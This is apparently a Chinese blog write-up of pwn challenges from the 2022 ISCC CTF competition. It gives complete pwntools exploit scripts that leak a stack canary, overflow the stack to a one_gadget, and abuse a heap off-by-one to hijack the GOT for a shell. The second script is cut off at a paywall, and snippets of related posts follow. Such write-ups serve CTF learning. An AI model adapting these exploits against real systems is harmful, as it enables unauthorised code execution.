2022ISCC PWN

已于 2022-09-01 19:06:00 修改
阅读量2.1k 收藏 8
点赞数 4
文章标签: 安全 系统安全
于 2022-07-05 21:17:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51232724/article/details/125626792
版权
本文记录了作者参加2022ISCC比赛时遇到的PWN类赛题,包括跳一跳、careless_note、create_id等,涉及栈溢出、堆溢出、格式化字符串、UAF等安全漏洞,分享了利用思路和解题技巧。
摘要由CSDN通过智能技术生成

第二次参加ISCC了,远比第一次做出的题目更多,因此记录一下做题思路。因为时隔较远一些,过去貌似一个多月了,这边只记录大概的一些思路。

目录

跳一跳

  这题比较有意思些,有不少点。首先是保护全开的
在这里插入图片描述
  查看了下代码,发现应该是栈溢出,但是有携带canary,所以首先是泄露出canary。总共有两个输入点:

  输入的地方距离canary只差了0xD8,而循环执行了0xE7次,所以是需要去中断后续的scanf的输入。观察到是%d的参数,那么在遇到字符输入时会停止获取输入,所以只要在覆盖到canary时,输入一个字符即可阻止scanf继续读取输入。
在这里插入图片描述
  其他就不再多谈了,看exp理解即可。

#!usr/bin/env python 
#coding=utf-8
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
elf = ELF("./1")
#p = process('./1')
libc = ELF('./libc-2.27.so')
p = remote("123.57.69.203", 7020)
p.recvuntil("Hello CTFer! Welcome to the world of pwn~\n")
#gdb.attach(p, "b *$rebase(0x1217)")
for i in range(217):
    p.sendline('1')
p.send('a')
p.recvuntil('Your input is: ')
p.recv(0xd8)
canary = u64(p.recv(8)) - 1

log.info("canary = " + hex(canary))
stack = u64(p.recv(6).ljust(8, '\x00')) + 8
log.info("stack==>0x%x" %stack)
payload = 'a'*0xd8 + p64(canary) + 'deadbeef' + '\x98'
p.send(payload)
p.recvuntil("Hello CTFer! Welcome to the world of pwn~\n")
for i in range(88):
    p.sendline('1')
p.send('a')
p.recvuntil('Your input is: ')
p.recv(88)
libc_base = u64(p.recv(6).ljust(8, '\x00')) - libc.sym['_IO_2_1_stderr_']
log.info("libc_base==>0x%x" %libc_base)
ogg = libc_base + 0x4f2c5
payload = 'a'*0xd8 + p64(canary) + 'deadbeef' + p64(ogg)
p.send(payload)
p.interactive()

careless_note

  堆题,在输入函数内,存在一个offbyone漏洞
在这里插入图片描述
在这里插入图片描述
  选择去劫持got表来getshell,同时泄露地址也通过got表实现的。

#!usr/bin/env python 
#coding=utf-8
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
elf = ELF("./careless_note")
libc = ELF("./libc-2.23.so")
p = remote("123.57.69.203", 8010)
def debug():
	gdb.attach(p, "b main")
	#gdb.attach(p, "b *$rebase(0x)")

def add(size, content):
    p.sendlineafter("Your choice :", '1')
    p.recvuntil("Size of Heap : ")
    p.sendline(str(size))
    p.recvuntil("Content of heap:")
    p.send(content)
	
def edit(idx, content):
    p.sendlineafter("Your choice :", '2')
    p.recvuntil("Index :")
    p.sendline(str(idx))
    p.sendlineafter("Your choose:", '1')
    p.recvuntil("Content of heap : ")
    p.send(content)

def show(idx):
    p.sendlineafter("Your choice :", '3')
    p.recvuntil(" ")
    p.sendline(str(idx))

def free(idx):
    p.sendlineafter("Your choice :", '2')
    p.recvuntil("Index :")
    p.sendline(str(idx))
    p.sendlineafter("Your choose:", '0')

free_got = elf.got["free"]
add(0x18,'a') 
add(0x10,'b') 
add(0x10,'c') 
add(0x10,"/bin/sh\x00") 
edit(0,'a'*0x18+'\x81')
free(1)
add(0x70,'a'*0x40 + p64(0x8) + p64(free_got))
show(2)
p.recvuntil("Content : ")
libc_base = u64(p.recv(6).ljust(8,'\x00')) - libc.sym['free']
log.success(hex(libc_base))
sys=libc.sym["system"<
最低0.47元/天 解锁文章
ShouCheng3
关注
ISCC部分pwn题解
qq_46441427的博客
05-25 1999
菜的扣脚刚刚入门堆的辣鸡pwn手 M78 整型漏洞,那个262有点迷,感觉是263 flag{N@x_addr_*EnaBleD%} game 随机数的题,利用python脚本修改随机数种子 再写一个C脚本算随机数 成功拿到flag ISCC{this****&haobdvaljdnvoa0%bor} BOX 有libc,查看发现是libc2.27考虑tcache 写增删改查函数 泄露libc 计算malloc 最后劫持程序流 ISCC{angav**anva&77lnv
ISCC2024--pwn
最新发布
qq_74259765的博客
06-25 748
ISCC2024部分pwn题目wp
ISCC 2022
njh18790816639的博客
06-13 5191
sim_treasure 简单的32位循环格式化字符串漏洞,位于栈上,无过滤\x00; from pwn import * context(log_level='debug',os='linux',arch='i386') binary = './sp1' r = remote('123.57.69.203',7010) #r = process(binary) elf = ELF(binary) #libc = elf.libc libc = ELF('./libc-2.27.so') offset
iscc-2022
zhhhb1005的博客
06-05 1053
分析题目,info被强制转换成为数组,get传参 information ,同时要满足step1和step2才能得到flag。step1要求year=2022step2要求item为三个值的数组,第一个值为数组payload pop2022 看开头意思是如果使用get的wish传参那么就反序列化这个wish,如果不是则显示源代码。 流程 exp payload: get传参,然后将结果base64解密。 访问/ypHeMPardErE.zip ,得到源码 这⾥之前可以判断
180509 Pwn-ISCCPwn2)
whklhhhh的博客
05-25 888
写作Pwn3读作Pwn2 23333 打开pwn3反编译,发现菜单,很明显是堆的题目了 看了一下在free的时候没有清空指针,造成野指针 以我浅薄的知识猜想是double free吧 参考ctf-wiki的fastbin-attack 主要漏洞在于通过fastbin管理堆的情况下,在free时仅会检查链表头部(即main_arena指向)的chunk 第一次释放free(chun...
ISCC 2022 wp
akxnxbshai的博客
06-09 7816
ISCC 2022 部分题目的解题过程。
2022ISCC下载题目附件.rar
04-18
没想到不知不觉一年时间就这样过去了,又到了一年一度的ISCC信息对抗大赛,不知道去年打比赛的小伙伴今年还能不能再碰到,期待与君再相见( •̀ ω •́ )y所以今天就把去年的题目再复现一遍供师傅们参考 ...
ISCC-2022 部分wp
qaq517384的博客
06-07 3197
目录Web冬奥会Misc单板小将苏翊鸣2022冬奥会藏在星空的诗-1ReverseAmy's Code Web 冬奥会 $info[“year”]=2022,if比较的赋值,永真 0项值为0绕过array_search()函数,其他随意 payload: ?Information={"year":"a","items":[0,["1","2","3"],"1"]} Misc 单板小将苏翊鸣 改图片高度得到二维码,扫码回答问题 15942为压缩包密码 解压得到flag 2022冬奥会 吉祥物(压缩包密码)
ISCCpwn1格式化字符串漏洞详解!
BadRer的博客
05-29 3479
作为小白的我,自从入了ctf的坑就再也没爬起来过,从无到有实在是很辛苦。仅以此片纪念我的青春。   直接进入正题。这是个很明显的32位的格式化字符串漏洞。 上手就先leak出libc地址,求偏移得到system地址,(我也忘了有没有给lib库,反正我是在本地调试,拿自己的lib库。Ps:在本地可以通过./libc.so.6或者ldd --version 查看libc的版本号,作为新手还是
ISCC2022题目附件
06-06
2022ISCC所有题目附件,包含ISCC2022-练武题附件和ISCC2022-擂台题附件 信息安全已涉及到国家政治、经济、文化、社会和生态文明的建设,信息系统越发展到它的高级阶段,人们对其依赖性就越强,从某种程度上讲其越容易遭受攻击,遭受攻击的后果越严重。“网络安全和信息化是一体之两翼、驱动之双轮。没有网络安全就没有国家安全。”信息是社会发展的重要战略资源,国际上围绕信息的获取、使用和控制的斗争愈演愈烈,信息安全保障能力是综合国力、经济竞争实力和生存能力的重要组成部分,是世纪之交世界各国奋力攀登的至高点。 信息安全与对抗技术竞赛(ISCC:Information Security and Countermeasures Contest),于2004年首次举办(国内第一),2022年大学生竞赛为第19届,小学生信息安全对抗赛为第11届,河南赛区为第10届,广西赛区为第9届,研究生赛为第5届,累计参赛人数7.2万人次以上,近年来参赛院校1000多所,影响广泛且深远。
ISCC2021-[pwn]game
半岛铁盒的博客
05-26 692
from pwn import * from ctypes import * p = remote('39.96.88.40','7040') context.log_level="debug" payload = b'a' * (0x30-0x8) + p32(0) p.sendlineafter("Your name is :",payload) rand = ['55 ','15 ','82 ','1 ','98 ','68 ','67 ','15 ','86 ','3 '] fo...
ISCC2017 pwn 200 —— 字符串格式化漏洞
giantbranch的专栏
05-31 3631
简介  这是一道字符串格式化漏洞的题目,给了libc,直接字符串格式化漏洞泄露出地址,就可以算出system的地址,最后再写got表就行了伪代码int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { int v3; // [sp+14h] [bp-6Ch]@3 int v4; // [sp+1
2022-ISCTF-部分MISC和PWN
tbsqigongzi的博客
11-05 1326
ISCTF-部分wp
2019_iscc_pwn350
Jc
05-26 521
引 1.这个道题有两个考察点 一个是ret2dl的了解(只要看过这个技术的,都知道哪里只需要拿过来使用就可以了)还有一个就是main函数末尾的堆栈平衡(自己在这里卡了好久) offset 相信解决的offset的大小,这道题有迎刃而解了(先补充一个知识点,对于新手) 1.第一个图是pwn350 第二个图是普通的main函数结尾处 2.IDA手动输入一下,会发现 ...
2022年第19届信息安全与对抗技术竞赛
ISCC2022的博客
04-14 5391
2022年第19届信息安全与对抗技术竞赛通知
180503 Pwn-ISCC(1)
whklhhhh的博客
05-25 524
pwn复健的第一题(:з」∠)还好比较简单 简单分析一下,在Menu存在栈溢出,并且没有Canary保护 不过有NX保护,因此无法直接传入Shellcode 查了一下pwn的相关知识,发现这里导入了system函数,因此可以直接使用ret2system来getshell system传参的寄存器是edi 这个常识级别的东西因为不记得,导致用栈传参试了半天不知道为啥错orz发现这个点...
iscc2022弱雪wp
Tokeii想躺平
05-06 1766
创建文件部分 import os ************************************** ************************************** filepath = ‘./dir’ for i in range(1936): ************************************** # ************************************** # ********************************
ISCC where
09-08
ISCC是指"Intelligent Self-Configuring Cluster",其的"ISCC"表示智能自配置集群。在ISCC,有两种集群形式,一种是分散式集群,另一种是集式集群。在分散式集群,每个节点都有潜力成为簇头,而在集式集群,基站选择最佳的簇头。这里的"最佳"是通过一些规则来近似确定的。在存储的过程,s2占据了多个字节,而先分配的字节通常被放在低地址处。由于s2、v4、v5和v6的地址是相连的,所以当对s2的起始地址进行19个字节的异或处理时,v4、v5和v6的数值也会被处理。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ShouCheng3

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值